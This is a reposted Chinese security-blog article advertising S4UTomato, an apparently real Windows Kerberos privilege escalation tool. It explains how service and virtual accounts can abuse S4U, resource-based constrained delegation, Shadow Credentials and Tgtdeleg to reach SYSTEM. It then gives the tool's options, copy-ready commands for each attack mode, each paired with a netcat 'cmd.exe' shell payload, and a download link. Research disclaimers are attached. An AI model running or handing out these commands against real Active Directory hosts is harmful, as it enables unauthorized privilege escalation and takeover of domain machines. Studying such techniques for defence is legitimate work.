S4UTomato!Kerberos提权利用工具

admin
admin
admin
139629
文章
114
评论
2023年8月20日22:32:30评论53 views字数 1973阅读6分34秒阅读模式

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧设为星标”,否则可能看不到了

hw攻防演练期间,工具安全性自测!

Kerberos

在计算机加入域的任何情况下,只要您可以在 Windows 服务帐户或 Microsoft 虚拟帐户的上下文中运行代码(前提是 Active Directory 没有),您就可以利用“传统土豆”技术进行本地权限升级。没有经过强化来完全防御此类攻击。
“Potato”的早期利用技术几乎相同:利用COM接口的某些功能,欺骗NT AUTHORITYSYSTEM帐户连接并验证到攻击者控制的RPC服务器。
然后,通过一系列 API 调用,在此身份验证过程中执行中间(NTLM 中继)攻击,从而为本地系统上的 NT AUTHORITYSYSTEM 帐户生成访问令牌。

最后这个token被窃取,使用CreateProcessWithToken()CreateProcessAsUser()函数传递token并创建一个新的进程来获取SYSTEM权限。

在 Windows 域环境中,加入域的系统计算机帐户使用 SYSTEM、NETWORK SERVICE 和 Microsoft 虚拟帐户进行身份验证。了解这一点至关重要,因为在现代版本的 Windows 中,大多数 Windows 服务默认使用 Microsoft 虚拟帐户运行。值得注意的是,IIS 和 MSSQL 使用这些虚拟帐户,我相信其他应用程序也可能使用它们。因此,我们可以滥用S4U扩展来获取本机上域管理员帐户“Administrator”的服务票据。然后在 James Forshaw ( @tiraniddo)SCMUACBypass的帮助下,我们可以使用该票证创建系统服务并获得 SYSTEM 权限。这实现了与“Potato”系列特权升级技术中使用的传统方法相同的效果。

在此之前,我们需要获取本地机器帐户的TGT(Ticket Granting Ticket)。这并不容易,因为服务帐户权限施加的限制使我们无法获取计算机的长期密钥,从而无法构造 KRB_AS_REQ 请求。为了实现上述目标,我利用了三种技术:Resource-based Constrained DelegationShadow CredentialsTgtdeleg。作者基于 Rubeus工具集构建了这个项目。

使用示例

C:UserswhoamiDesktop>S4UTomato.exe --helpS4UTomato 1.0.0-betaCopyright (c) 2023  -d, --Domain              Domain (FQDN) to authenticate to.  -s, --Server              Host name of domain controller or LDAP server.  -m, --ComputerName        The new computer account to create.  -p, --ComputerPassword    The password of the new computer account to be created.  -f, --Force               Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer                            object.  -c, --Command             Program to run.  -v, --Verbose             Output verbose debug information.  --help                    Display this help screen.  --version                 Display version information.

利用Resource-based Constrained Delegation的LEP:

S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"
S4UTomato!Kerberos提权利用工具

利用Shadow Credentials + S4U2self的LEP:

S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f
S4UTomato!Kerberos提权利用工具

利用Tgtdeleg + S4U2self的LEP:

# First retrieve the TGT through TgtdelegS4UTomato.exe tgtdeleg# Then run SCMUACBypass to obtain SYSTEM privilegeS4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"
S4UTomato!Kerberos提权利用工具

下载地址

https://github.com/wh0amitz/S4UTomato

原文始发于微信公众号(Hack分享吧):S4UTomato!Kerberos提权利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月20日22:32:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   S4UTomato!Kerberos提权利用工具https://cn-sec.com/archives/1965510.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息